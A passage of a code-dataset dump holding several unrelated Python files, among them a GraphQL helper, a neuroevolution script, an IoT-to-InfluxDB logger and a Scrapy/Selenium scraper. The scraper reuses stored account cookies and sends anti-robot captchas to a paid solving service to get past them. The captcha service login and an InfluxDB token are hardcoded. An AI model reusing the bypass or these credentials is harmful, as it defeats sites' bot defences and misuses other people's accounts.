target=self.worker.create_parent\n                else: target=self.worker.create_child\n\n                start = True\n\n                args[0] = alive\n                job = Process(target=target, args=tuple(args))\n                self.jobs[alive] = job \n                job.start()\n\n            else:\n\n                time.sleep(0.1)\n\n    \n    def run(self):\n        \n        found = False\n\n        print(f\"Searching for previous generations\")\n        population = sorted(glob.glob(f\"{self.population_dir}/*/*/alive.txt\"))\n        \n        if len(population) > 0: \n            \n            if len(population) == self.population_size or len(population) == self.population_size*(self.number_of_child+1): \n\n                found = True\n                \n                for individual in population:\n\n                    self.gen = max(self.gen, int(individual.split('/')[1]))\n                    self.ind_counter = max(self.ind_counter, int(individual.split('/')[2]))\n                \n                if len(population) == self.population_size*(self.number_of_child+1): self.evolve_ras()\n\n                print(f\"Found Last Generation {self.gen} with last individual {self.ind_counter}\")\n\n            else: raise Exception(f\"Corrupted files, please delete the files in {self.population_dir}. They may have been left over from an interrupted evolution\")\n\n        else: found = False\n\n        if found == False: self.create_initial_population()\n\n        self.evolve()\n\n    \n    def create_initial_population(self):\n        \n        print(f\"Did not find any previous generation\\n\")\n\n        self.gen += 1\n\n        generation_directory = f\"{self.population_dir}/{self.gen}/\"\n        if not os.path.exists(generation_directory): os.makedirs(generation_directory)\n\n        self.jobs = {}\n        \n        for _ in range(self.population_size): \n            self.ind_counter += 1\n            \n            individual = f\"{self.population_dir}/{self.gen}/{self.ind_counter}\"\n            if not os.path.exists(individual): os.makedirs(individual)\n\n            self.create_lineage(individual)\n            self.parallel_run(0, [0, individual, self.population, self.store_individual, self.gen])\n        \n        for deviceID in self.jobs:\n            self.jobs[deviceID].join()\n            if self.jobs[deviceID].exception is not None: raise Exception(f\"{self.jobs[deviceID].exception[0]}, {self.jobs[deviceID].exception[1]}\")\n        \n        self.population.write_log(f\"\\n\") \n        self.population.save_populations(f\"{self.population_dir}/{self.gen}\")\n\n    \n    def evolve_ras(self):\n\n        population = sorted(glob.glob(f\"{self.population_dir}/*/*/alive.txt\"))\n        assert len(population) == self.population_size\n\n        self.population.read_populations(f\"{self.population_dir}/{self.gen}\")\n\n        self.gen += 1\n\n        generation_directory = f\"{self.population_dir}/{self.gen}/\"\n        if not os.path.exists(generation_directory): os.makedirs(generation_directory)\n\n        cluster_population = {'individual':[], 'dna':[], 'metrics':[], 'spectrum': []}\n        \n        for i, individual in enumerate(population):\n\n            individual = individual.split('/alive.txt')[0]\n            dna, metrics = self.read_individual(individual)\n\n            cluster_population['individual'] += [individual]\n            cluster_population['dna'] += [dna]\n            cluster_population['metrics'] += [metrics]\n            cluster_population['spectrum'] += [dna['graph'].graph['spectrum']]\n\n        child_individuals = []\n        \n        self.jobs = {}\n        \n        for parent_individual in population * self.number_of_child: \n\n            self.ind_counter += 1\n\n            parent_individual = parent_individual.split('/alive.txt')[0] \n            parent_dna, parent_metrics = self.read_individual(parent_individual)\n\n            child_individual = f\"{self.population_dir}/{self.gen}/{self.ind_counter}\"\n            if not os.path.exists(child_individual): os.makedirs(child_individual)\n\n            child_individuals += [child_individual]\n\n            self.store_lineage(child_individual, parent_individual)\n            self.parallel_run(1, [0, parent_dna, self.num_mutations, child_individual, self.population, self.store_individual, self.gen])\n\n        for deviceID in self.jobs:\n\n            self.jobs[deviceID].join()\n            if self.jobs[deviceID].exception is not None: raise Exception(f\"{self.jobs[deviceID].exception[0]}, {self.jobs[deviceID].exception[1]}\")\n        \n        for child_individual in child_individuals: \n\n            child_dna, child_metrics = self.read_individual(child_individual)\n            child_spectrum = child_dna['graph'].graph['spectrum']\n\n            normalisation_spectrum = normalise(cluster_population['spectrum'] + [child_spectrum])\n            distance = [np.linalg.norm(x-normalisation_spectrum[-1]) for x in normalisation_spectrum[:-1]]\n            closest_cluster_index = distance.index(min(distance))\n\n            if cluster_population['metrics'][closest_cluster_index]['fitness'] < child_metrics['fitness']:\n                \n                self.population.write_log(f\"--> Worker changed cluster {closest_cluster_index} head {cluster_population['individual'][closest_cluster_index].split('/')[2]} of fitness {cluster_population['metrics'][closest_cluster_index]['fitness']:.2f} to 
{child_individual.split('/')[2]} of fitness {child_metrics['fitness']:.2f}\n\")\n\n                dead_individual_dir = cluster_population['individual'][closest_cluster_index]\n\n                os.remove(f\"{dead_individual_dir}/alive.txt\")\n                open(f\"{dead_individual_dir}/dead_{self.gen}.txt\", 'w').close()\n\n                cluster_population['individual'][closest_cluster_index] = child_individual\n                cluster_population['dna'][closest_cluster_index] = child_dna\n                cluster_population['metrics'][closest_cluster_index] = child_metrics\n                cluster_population['spectrum'][closest_cluster_index] = child_spectrum\n\n            else:\n                \n                self.population.write_log(f\"--> Worker retained cluster {closest_cluster_index} head {cluster_population['individual'][closest_cluster_index].split('/')[2]} of fitness {cluster_population['metrics'][closest_cluster_index]['fitness']:.2f} over {child_individual.split('/')[2]} of fitness {child_metrics['fitness']:.2f}\\n\") \n                \n                dead_individual_dir = child_individual\n\n                os.remove(f\"{dead_individual_dir}/alive.txt\")\n                open(f\"{dead_individual_dir}/dead_{self.gen}.txt\", 'w').close()\n\n        self.population.write_log(f\"\\n\") \n        self.population.clean_populations()\n\n        for pop in sorted(glob.glob(f\"{self.population_dir}/*/*/alive.txt\")):\n\n            dna, metrics = self.read_individual(pop.split('/alive.txt')[0])\n            self.population.update_populations(dna)\n\n        self.population.save_populations(f\"{self.population_dir}/{self.gen}\")\n    \n\n    def evolve(self):\n        while True:\n            self.evolve_ras() \n\n    \n    def read_individual(self, individual):\n        with open(f\"{individual}/dna.pkl\", 'rb') as dna_file: dna = pickle.load(dna_file)\n        with open(f\"{individual}/metrics.pkl\", 'rb') as metrics_file: metrics = pickle.load(metrics_file)\n        return dna, metrics\n\n    \n    def store_individual(self, individual, dna, metrics, mutations=None): \n        with open(f\"{individual}/dna.pkl\", 'wb') as dna_file: pickle.dump(dna, dna_file, pickle.HIGHEST_PROTOCOL)\n        with open(f\"{individual}/metrics.pkl\", 'wb') as metrics_file: pickle.dump(metrics, metrics_file, pickle.HIGHEST_PROTOCOL)\n        if mutations is not None: \n            with open(f\"{individual}/mutations.pkl\", 'wb') as mutations_file: pickle.dump(mutations, mutations_file, pickle.HIGHEST_PROTOCOL)\n\n    \n    def store_lineage(self, child_individual, parent_individual): \n        with open(f\"{parent_individual}/lineage.pkl\", 'rb') as lineage_file: lineage = pickle.load(lineage_file)\n        lineage += [parent_individual.split('/')[2]]\n        with open(f\"{child_individual}/lineage.pkl\", 'wb') as lineage_file: pickle.dump(lineage, lineage_file, pickle.HIGHEST_PROTOCOL)\n\n    \n    def create_lineage(self, individual): \n        with open(f\"{individual}/lineage.pkl\", 'wb') as lineage_file: pickle.dump([individual.split('/')[2]], lineage_file, pickle.HIGHEST_PROTOCOL)\n\n    \ndef to_bool(arg_bool):\n\n    if arg_bool in ('True', 'true', 'T', 't', '1', 'Y', 'y'): return True\n    elif arg_bool in ('False', 'false', 'F', 'f', '0', 'N', 'n'): return False\n    else: raise argparse.ArgumentTypeError('Boolean value expected.')\n\nif __name__ == '__main__':\n\n    parser = argparse.ArgumentParser(description=('Robust Architecture Search'))\n\n    # Use for creating and mutating individual of population\n    parser.add_argument(\"--use_cycles\", \"-cy\", action=\"store_false\", help=\"if not to use cycles in populations\")\n    parser.add_argument(\"--use_adaptive_mutations\", \"-am\", action=\"store_true\", help=\"if use adaptive mutations\")\n    parser.add_argument(\"--use_random_params\", \"-rp\", action=\"store_true\", help=\"if use random params\")\n    
parser.add_argument(\"--use_non_squares\", \"-sq\", action=\"store_true\", help=\"if use non-square kernels and strides\")\n \n # Use for training an individual\n parser.add_argument(\"--use_augmentation\", \"-au\", action=\"store_true\", help=\"if use augmented training\")\n parser.add_argument(\"--use_limited_data\", \"-ld\", action=\"store_true\", help=\"if use limited data for training\")\n parser.add_argument(\"--dataset\", \"-d\", default=2, type=int, help=\"Dataset to be used for training\")\n parser.add_argument(\"--epochs\", \"-e\", default=50, type=int, help=\"Number of epochs to be used for a single individual\")\n \n # Use for type of evolving generations\n parser.add_argument(\"--num_mutations\", \"-m\", default=5, type=int, help=\"Number of mutations an individual undergoes\")\n parser.add_argument(\"--num_mutated_child\", \"-n\", default=2, type=int, help=\"Number of mutated individuals for a single parent\")\n parser.add_argument(\"--population_size\", \"-p\", default=25, type=int, help=\"Number of individuals in the population\")\n \n # Use for changing directories\n parser.add_argument(\"--population_dir\", \"-dir\", default=\"population\", type=str, help=\"Directory for storing all individuals\")\n parser.add_argument(\"--log_dir\", \"-log\", default=\"logs\", type=str, help=\"Directory for logs\")\n \n # Use for dry run\n parser.add_argument(\"--test\", \"-test\", action=\"store_false\", help=\"Option for Dry Run to test, if the code runs. Please also check ./-log_dir-/exceptions.log too.\")\n \n args = parser.parse_args()\n \n print(args)\n \n NeuroEvolution(args).run()\n \n","sub_path":"run_evolution.py","file_name":"run_evolution.py","file_ext":"py","file_size_in_byte":13604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"41115464","text":"from typing import Any, AsyncGenerator, Sequence, cast\n\nimport graphql as _graphql\nfrom graphql import ExecutionResult, GraphQLError, GraphQLSchema, parse\nfrom graphql.execution import Middleware\nfrom graphql.validation.rules import RuleType\n\nfrom .format_errors import format_error\nfrom .types import ErrorFormatter, GraphQLResult, SubscriptionResult\n\n\nasync def graphql(\n schema: GraphQLSchema,\n data: Any,\n *,\n root_value: Any = None,\n context_value: Any = None,\n debug: bool = False,\n validation_rules=None,\n error_formatter: ErrorFormatter = format_error,\n middleware: Middleware = None,\n **kwargs,\n) -> GraphQLResult:\n try:\n validate_data(data)\n query, variables, operation_name = (\n data[\"query\"],\n data.get(\"variables\"),\n data.get(\"operationName\"),\n )\n\n if validation_rules:\n errors = run_custom_validation(schema, query, validation_rules)\n if errors:\n return handle_graphql_errors(\n errors, error_formatter=error_formatter, debug=debug\n )\n\n result = await _graphql.graphql(\n schema,\n query,\n root_value=root_value,\n context_value=context_value,\n variable_values=variables,\n operation_name=operation_name,\n middleware=middleware,\n **kwargs,\n )\n except GraphQLError as error:\n return handle_graphql_errors(\n [error], error_formatter=error_formatter, debug=debug\n )\n else:\n return handle_query_result(result, error_formatter=error_formatter, debug=debug)\n\n\ndef graphql_sync(\n schema: GraphQLSchema,\n data: Any,\n *,\n root_value: Any = None,\n context_value: Any = None,\n debug: bool = False,\n validation_rules=None,\n error_formatter: ErrorFormatter = format_error,\n middleware: Middleware = None,\n **kwargs,\n) -> 
GraphQLResult:\n try:\n validate_data(data)\n query, variables, operation_name = (\n data[\"query\"],\n data.get(\"variables\"),\n data.get(\"operationName\"),\n )\n\n if validation_rules:\n errors = run_custom_validation(schema, query, validation_rules)\n if errors:\n return handle_graphql_errors(\n errors, error_formatter=error_formatter, debug=debug\n )\n\n result = _graphql.graphql_sync(\n schema,\n query,\n root_value=root_value,\n context_value=context_value,\n variable_values=variables,\n operation_name=operation_name,\n middleware=middleware,\n **kwargs,\n )\n except GraphQLError as error:\n return handle_graphql_errors(\n [error], error_formatter=error_formatter, debug=debug\n )\n else:\n return handle_query_result(result, error_formatter=error_formatter, debug=debug)\n\n\nasync def subscribe( # pylint: disable=too-complex\n schema: GraphQLSchema,\n data: Any,\n *,\n root_value: Any = None,\n context_value: Any = None,\n debug: bool = False,\n validation_rules=None,\n error_formatter: ErrorFormatter = format_error,\n **kwargs,\n) -> SubscriptionResult:\n try:\n validate_data(data)\n query, variables, operation_name = (\n data[\"query\"],\n data.get(\"variables\"),\n data.get(\"operationName\"),\n )\n\n if validation_rules:\n errors = run_custom_validation(schema, query, validation_rules)\n if errors:\n return False, [error_formatter(error, debug) for error in errors]\n\n document = parse(query)\n result = await _graphql.subscribe(\n schema,\n document,\n root_value=root_value,\n context_value=context_value,\n variable_values=variables,\n operation_name=operation_name,\n **kwargs,\n )\n except GraphQLError as error:\n return False, [error_formatter(error, debug)]\n else:\n if isinstance(result, ExecutionResult):\n return False, [error_formatter(error, debug) for error in result.errors]\n return True, cast(AsyncGenerator, result)\n\n\ndef run_custom_validation(\n schema: GraphQLSchema, query: str, rules: Sequence[RuleType]\n) -> Sequence[GraphQLError]:\n try:\n document_ast = parse(query)\n except: # pylint: disable=bare-except\n # Query does not validate\n return []\n else:\n return _graphql.validate(schema, document_ast, rules)\n\n\ndef handle_query_result(\n result, *, error_formatter=format_error, debug=False\n) -> GraphQLResult:\n response = {\"data\": result.data}\n if result.errors:\n response[\"errors\"] = [error_formatter(error, debug) for error in result.errors]\n return True, response\n\n\ndef handle_graphql_errors(\n errors: Sequence[GraphQLError], *, error_formatter, debug\n) -> GraphQLResult:\n return False, {\"errors\": [error_formatter(error, debug) for error in errors]}\n\n\ndef validate_data(data: dict) -> None:\n if not isinstance(data, dict):\n raise GraphQLError(\"Operation data should be a JSON object\")\n\n validate_query_body(data.get(\"query\"))\n validate_variables(data.get(\"variables\"))\n validate_operation_name(data.get(\"operationName\"))\n\n\ndef validate_query_body(query) -> None:\n if not query or not isinstance(query, str):\n raise GraphQLError(\"The query must be a string.\")\n\n\ndef validate_variables(variables) -> None:\n if variables is not None and not isinstance(variables, dict):\n raise GraphQLError(\"Query variables must be a null or an object.\")\n\n\ndef validate_operation_name(operation_name) -> None:\n if operation_name is not None and not isinstance(operation_name, str):\n raise GraphQLError('\"%s\" is not a valid operation name.' 
% operation_name)\n","sub_path":"ariadne/graphql.py","file_name":"graphql.py","file_ext":"py","file_size_in_byte":5918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"121187504","text":"# -*- coding: utf-8 -*-\n\n# Define here the models for your spider middleware\n#\n# See documentation in:\n# https://doc.scrapy.org/en/latest/topics/spider-middleware.html\n\nfrom scrapy import signals\nimport selenium\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium import webdriver\nfrom logging import getLogger\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom scrapy.http import HtmlResponse\nfrom selenium.common.exceptions import TimeoutException\nfrom io import BytesIO\nfrom PIL import Image\nimport time\nfrom selenium.webdriver import ActionChains\nfrom ssbase.chaojiying import Chaojiying\nfrom ssbase.usecookie import getcookie1, getcookie2,getcookie4,getcookie3\nimport random\nimport redis\nimport json\nimport os\n\nCHAOJIYING_USERNAME = '15309080101'\nCHAOJIYING_PASSWORD = '271255542'\nCHAOJIYING_SOFT_ID = 899231\nCHAOJIYING_KIND = 9004\n\nusernames = ['13880777745','17313135669','18980755350']\n\nclass SsbaseSpiderMiddleware(object):\n # Not all methods need to be defined. If a method is not defined,\n # scrapy acts as if the spider middleware does not modify the\n # passed objects.\n\n @classmethod\n def from_crawler(cls, crawler):\n # This method is used by Scrapy to create your spiders.\n s = cls()\n crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)\n return s\n\n def process_spider_input(self, response, spider):\n # Called for each response that goes through the spider\n # middleware and into the spider.\n\n # Should return None or raise an exception.\n return None\n\n def process_spider_output(self, response, result, spider):\n # Called with the results returned from the Spider, after\n # it has processed the response.\n\n # Must return an iterable of Request, dict or Item objects.\n for i in result:\n yield i\n\n def process_spider_exception(self, response, exception, spider):\n # Called when a spider or process_spider_input() method\n # (from other spider middleware) raises an exception.\n\n # Should return either None or an iterable of Response, dict\n # or Item objects.\n pass\n\n def process_start_requests(self, start_requests, spider):\n # Called with the start requests of the spider, and works\n # similarly to the process_spider_output() method, except\n # that it doesn’t have a response associated.\n\n # Must return only requests (not items).\n for r in start_requests:\n yield r\n\n def spider_opened(self, spider):\n spider.logger.info('Spider opened: %s' % spider.name)\n\n\nclass SsbaseDownloaderMiddleware(object):\n\n def __init__(self):\n self.logger = getLogger(__name__)\n self.options = Options()\n self.options.add_argument('-headless')\n self.browser = webdriver.Firefox(firefox_options=self.options)\n self.wait = WebDriverWait(self.browser,10)\n # Not all methods need to be defined. 
If a method is not defined,\n # scrapy acts as if the downloader middleware does not modify the\n # passed objects.\n def __del__(self):\n self.browser.quit()\n\n @classmethod\n def from_crawler(cls, crawler):\n # This method is used by Scrapy to create your spiders.\n s = cls()\n crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)\n crawler.signals.connect(s.spider_closed, signal=signals.spider_closed)\n return s\n\n def process_request(self, request, spider):\n rds = redis.StrictRedis(host='192.168.1.32', port=6379, decode_responses=True)\n self.logger.debug('Selenium is Starting')\n try:\n users = random.choice(usernames)\n self.browser.get(request.url)\n self.browser.delete_all_cookies()\n for i in range(1, 16):\n c = rds.hget(users, 'cookies{}'.format(i))\n self.browser.add_cookie(json.loads(c))\n self.browser.get(request.url)\n # print(self.browser.page_source)\n return HtmlResponse(url=request.url, body=self.browser.page_source, request=request, encoding='utf-8',\n status=200)\n except TimeoutException:\n return HtmlResponse(url=request.url, status=500, request=request)\n # Called for each request that goes through the downloader\n # middleware.\n\n # Must either:\n # - return None: continue processing this request\n # - or return a Response object\n # - or return a Request object\n # - or raise IgnoreRequest: process_exception() methods of\n # installed downloader middleware will be called\n # return None\n\n def process_response(self, request, response, spider):\n nowurl = self.browser.current_url\n if nowurl[8:17] == 'antirobot':\n self.run_verify()\n return response\n\n else:\n return response\n # Called with the response returned from the downloader.\n\n # Must either;\n # - return a Response object\n # - return a Request object\n # - or raise IgnoreRequest\n # return response\n\n def process_exception(self, request, exception, spider):\n # Called when a download handler or a process_request()\n # (from other downloader middleware) raises an exception.\n\n # Must either:\n # - return None: continue processing this exception\n # - return a Response object: stops process_exception() chain\n # - return a Request object: stops process_exception() chain\n pass\n\n def spider_opened(self, spider):\n spider.logger.info('Spider opened: %s' % spider.name)\n\n def spider_closed(self, spider):\n self.browser.close()\n self.browser.quit()\n os.system('taskkill /im geckodriver.exe /F')\n os.system('taskkill /im firefox.exe /F')\n\n def get_touch_element(self):\n element = self.wait.until(EC.presence_of_element_located((By.CLASS_NAME, 'new-box94')))\n return element\n\n def get_position(self):\n element = self.get_touch_element()\n time.sleep(2)\n location = element.location\n size = element.size\n print(location, size)\n top, bottom, left, right = location['y'], location['y'] + size['height'], location['x'], location['x'] + size['width']\n return (top, bottom, left, right)\n\n def get_screenshot(self):\n screenshot = self.browser.get_screenshot_as_png()\n self.browser.get_screenshot_as_file('C:\\\\Users\\Administrator\\Desktop\\prdabnormal.png')\n screenshot = Image.open(BytesIO(screenshot))\n return screenshot\n\n def get_touch_image(self, name='captcha.png'):\n top, bottom, left, right = self.get_position()\n screenshot = self.get_screenshot()\n captcha = screenshot.crop((left, top, right, bottom))\n # 截图位置必须为左上右下\n captcha.save(name)\n return captcha\n\n def get_points(self, captcha_result):\n try:\n groups = captcha_result.get('pic_str').split('|')\n locations = 
[[int(number) for number in group.split(',')] for group in groups]\n            return locations\n        except ValueError:\n            x = [[1, 1], [2, 2]]\n            return x\n\n    def click_words(self, locations):\n        for location in locations:\n            ActionChains(self.browser).move_to_element_with_offset(self.get_touch_element(), location[0],\n                                                                   location[1]).click().perform()\n            time.sleep(1)\n\n    def click_verify(self):\n        button = self.wait.until(EC.element_to_be_clickable((By.ID, 'submitie')))\n        button.click()\n\n    def run_verify(self):\n        chaojiying = Chaojiying(CHAOJIYING_USERNAME, CHAOJIYING_PASSWORD, CHAOJIYING_SOFT_ID)\n        image = self.get_touch_image()\n        bytes_array = BytesIO()\n        image.save(bytes_array, format='PNG')\n        result = chaojiying.post_pic(bytes_array.getvalue(), CHAOJIYING_KIND)\n        locations = self.get_points(result)\n        self.click_words(locations)\n        self.click_verify()\n","sub_path":"build/lib/ssbase/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":8257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"566123654","text":"# import leapyear\n# ano = int(input('Choose a year: '))\n# print(f'Is the year a leap year: {leapyear.get(ano)}')\n\nfrom datetime import date\nano = int(input('Which year do you want to check? (Enter 0 for the current year) '))\nif ano == 0:\n    ano = date.today().year\nif ano % 4 == 0 and ano % 100 != 0 or ano % 400 == 0:\n    print(f'The year {ano} is a leap year.')\nelse:\n    print(f'The year {ano} is not a leap year.')\n","sub_path":"ex032.py","file_name":"ex032.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"5885945","text":"import urllib.request, json\n\n# Let's grab the lineage of the feed I want\nchicago = urllib.request.urlopen('http://bikeshare-research.org/api/v1/categories/data/lineages/9/')\nchicago_feeds = chicago.read().decode(\"utf8\")\n# [{\"rid\":\"7\",\"bssid\":\"chicago\",\"feedname\":\"Divvy JSON\",\"feedurl\":\"http://www.divvybikes.com/stations/json\",\"feedurl2\":\"\",\"format\":\"json\",\"keyreq\":\"no\",\"parsername\":null},\n# {\"rid\":\"9\",\"bssid\":\"chicago\",\"feedname\":\"Divvy JSON\",\"feedurl\":\"http://www.divvybikes.com/stations/json\",\"feedurl2\":\"\",\"format\":\"json\",\"keyreq\":\"no\",\"parsername\":\"motivate\"}]\n# We see that the parsername was specified in the last update.\n\n# let's use the last update\nchicago_feeds_json = json.loads(chicago_feeds)\nchicago_data_feed = chicago_feeds_json[len(chicago_feeds_json)-1]\n\n# Get parsers to easily retrieve data by cloning the BSR_parsers repository locally:\n# git clone https://github.com/serialc/BSR_parsers.git\n\n# load the python parser\nfrom bsrp import BSRParser\n\n# Example 1: Chicago and method chaining\n# create instance of parser with data feed details\nparser = BSRParser(chicago_data_feed)\n\n# retrieving will return False or, if successful, the parser object (self)\nparser.retrieve()\n\n# save cleaned data locally according to the default schema (fullset)\nparser.save('')\n\n# save the raw data if you wish\nparser.save_raw('')\n\n# retrieve the data in array form, perhaps to insert into DB\ndata_array = parser.get_data_array()\n\n# or, since most of these methods return the object/self, do it all in one line\ndata_array = parser.retrieve().save('').save_raw('').get_data_array()\n\n# Example 2: Lyon and data feed API keys\n# For lyon we have already identified the feed we would like:\nlyon = urllib.request.urlopen('http://bikeshare-research.org/api/v1/categories/data/records/10')\nlyon_data_feed = json.loads(lyon.read())[0]\n\nparser = BSRParser(lyon_data_feed)\n# we don't need to explicitly call retrieve(), saving will do so if necessary\nparser.set_apikey('YOUR JCDECAUX API KEY').retrieve().save_raw('').save('')\n# data is saved locally, done\n\n# You can convert the UTC time to the local timezone using the timezone attribute in '/systems/lyon/categories/base/'\n# Add to your DB\n","sub_path":"parsers/pyBSRP/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"635662273","text":"#!/usr/bin/python3\nfrom mitemp.mitemp_bt.mitemp_bt_poller import MiTempBtPoller\nfrom mitemp.mitemp_bt.mitemp_bt_poller import MI_TEMPERATURE, MI_HUMIDITY, MI_BATTERY\nfrom btlewrap.bluepy import BluepyBackend\nfrom bluepy.btle import BTLEException\nimport traceback\nimport configparser\nimport os\nimport json\nimport datetime\n\nfrom datetime import datetime\nfrom influxdb_client import InfluxDBClient, Point, WritePrecision\nfrom influxdb_client.client.write_api import SYNCHRONOUS\n\nworkdir = os.path.dirname(os.path.realpath(__file__))\nconfig = configparser.ConfigParser()\nconfig.read(\"{0}/devices.ini\".format(workdir))\ndevices = config.sections()\n\n\n\n#INFLUXDB\nurl = \"https://westeurope-1.azure.cloud2.influxdata.com\"\ntoken = \"FS8hSyUmBlhOuQOpZVFqfs5dnFDEOBmUFoZLsQ1K296U55Xf9gJhVT1cXPA1G-83x4074S5QpoeLgroWKtlQ4g==\"\norg = \"1f225e11cad1e4dd\"\nbucket = \"a0e36d09e3bacaa3\"\nclient = InfluxDBClient(url=url, token=token)\nwrite_api = client.write_api(write_options=SYNCHRONOUS)\n\n\n\nfor device in devices:\n\n    mac = config[device].get(\"device_mac\")\n    poller = MiTempBtPoller(mac, BluepyBackend, ble_timeout=config[device].getint(\"timeout\", 10))\n\n    try:\n        temperature = poller.parameter_value(MI_TEMPERATURE)\n        humidity = poller.parameter_value(MI_HUMIDITY)\n        battery = poller.parameter_value(MI_BATTERY)\n\n        data = json.dumps({\n            \"temperature\": temperature,\n            \"humidity\": humidity,\n            \"battery\": battery\n        })\n\n        print(datetime.now(), device, \" : \", data)\n\n        point = Point(\"sensordata\") \\\n            .tag(\"device\", device) \\\n            .field(\"temp\", temperature) \\\n            .field(\"hum\", humidity) \\\n            .field(\"battery\", battery) \\\n            .time(datetime.utcnow(), WritePrecision.NS)\n\n        write_api.write(bucket, org, point)\n\n\n    except BTLEException as e:\n        print(\"Error connecting to device {0}: {1}\".format(device, str(e)))\n    except Exception as e:\n        print(\"Error polling device {0}. 
Device might be unreachable or offline.\".format(device))\n print(traceback.print_exc())\n","sub_path":"data-read-influxcloud.py","file_name":"data-read-influxcloud.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"32834043","text":"from django.contrib import admin\nfrom django.urls import path,include\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n\n #svoy\n path('', include('apps.home.urls')),\n path('service/', include('apps.service.urls')),\n path('portfolio/', include('apps.portfolio.urls')),\n path('news/', include('apps.news.urls')),\n]\n\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)\n urlpatterns += static(settings.STATIC_URL, document_root = settings.STATIC_ROOT)","sub_path":"viento/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"278502814","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n\"\"\"\n\nimport logging\nimport Artus.Utility.logger as logger\nlog = logging.getLogger(__name__)\n\nimport array\nimport ROOT\nimport sys\n\nimport Artus.HarryPlotter.inputbase as inputbase\n\n\nclass InputInteractive(inputbase.InputBase):\n\tdef __init__(self):\n\t\tsuper(InputInteractive, self).__init__()\n\t\n\tdef modify_argument_parser(self, parser, args):\n\t\tsuper(InputInteractive, self).modify_argument_parser(parser, args)\n\t\t\n\t\tself.input_options.add_argument(\"--x-errors\", type=str, nargs=\"+\",\n\t\t help=\"x-error(s)\")\n\t\tself.input_options.add_argument(\"--y-errors\", type=str, nargs=\"+\",\n\t\t help=\"y-error(s)\")\n\t\tself.input_options.add_argument(\"--z-errors\", type=str, nargs=\"+\",\n\t\t help=\"z-error(s)\")\n\t\n\tdef prepare_args(self, parser, plotData):\n\t\tsuper(InputInteractive, self).prepare_args(parser, plotData)\n\t\t\n\t\tself.prepare_list_args(plotData, [\"nicks\", \"x_errors\", \"y_errors\", \"z_errors\"])\n\t\t\n\t\t# parse values/errors to plot\n\t\tvalues_keys = [\"x_expressions\", \"y_expressions\", \"z_expressions\"]\n\t\terrors_keys = [\"x_errors\", \"y_errors\", \"z_errors\"]\n\t\tfor key in values_keys + errors_keys:\n\t\t\tif plotData.plotdict[key] != None:\n\t\t\t\tplotData.plotdict[key] = [[float(value) for value in (values.split() if values != None else [])] for values in plotData.plotdict[key]]\n\t\t\n\t\t# set default errors to 0.0\n\t\tfor index in xrange(len(plotData.plotdict[\"nicks\"])):\n\t\t\tfor values_key, errors_key in zip(values_keys, errors_keys):\n\t\t\t\tplotData.plotdict[errors_key][index] = len(plotData.plotdict[values_key][index]) * [0.0]\n\t\t\n\t\t# check that x/y/z values/errors for one plot have the same size\n\t\tfor index in xrange(len(plotData.plotdict[\"nicks\"])):\n\t\t\tn_values_per_plot = []\n\t\t\tfor key in values_keys + errors_keys:\n\t\t\t\tif len(plotData.plotdict[key][index]) > 0:\n\t\t\t\t\tn_values_per_plot.append(len(plotData.plotdict[key][index]))\n\t\t\tassert(len(set(n_values_per_plot)) == 1)\n\t\n\tdef run(self, plotData):\n\t\t\n\t\tfor nick, x_values, x_errors, y_values, y_errors, z_values, z_errors in zip(plotData.plotdict[\"nicks\"],\n\t\t\t\tplotData.plotdict[\"x_expressions\"], plotData.plotdict[\"x_errors\"], plotData.plotdict[\"y_expressions\"],\n\t\t\t\tplotData.plotdict[\"y_errors\"], plotData.plotdict[\"z_expressions\"], 
plotData.plotdict[\"z_errors\"]):\n\t\t\n\t\t\tif len(z_values) > 0:\n\t\t\t\tplotData.plotdict.setdefault(\"root_objects\", {})[nick] = ROOT.TGraph2DErrors(len(x_values),\n\t\t\t\t\t\tarray.array(\"d\", x_values), array.array(\"d\", y_values), array.array(\"d\", z_values),\n\t\t\t\t\t\tarray.array(\"d\", x_errors), array.array(\"d\", y_errors), array.array(\"d\", z_errors))\n\t\t\telif len(y_values) > 0:\n\t\t\t\tplotData.plotdict.setdefault(\"root_objects\", {})[nick] = ROOT.TGraphErrors(len(x_values),\n\t\t\t\t\t\tarray.array(\"d\", x_values), array.array(\"d\", y_values),\n\t\t\t\t\t\tarray.array(\"d\", x_errors), array.array(\"d\", y_errors))\n\t\t\telse:\n\t\t\t\tlog.fatal(\"Need both x and y values to draw a graph!\")\n\t\t\t\tsys.exit(1)\n\t\t\n\t\t# run upper class function at last\n\t\tsuper(InputInteractive, self).run(plotData)\n\n","sub_path":"HarryPlotter/python/input_modules/inputinteractive.py","file_name":"inputinteractive.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"616278417","text":"#!/usr/bin/python3\nfrom main import app\nfrom daemon import runner\n\n\nclass App():\n def __init__(self):\n self.stdin_path = '/dev/null'\n self.stdout_path = '/dev/null'\n self.stderr_path = '/home/vitaly/lid'\n self.pidfile_path = '/tmp/python_daemon.pid'\n self.pidfile_timeout = 5\n\n def run(self):\n app.run()\n\n\ndaemon_app = App()\ndaemon_runner = 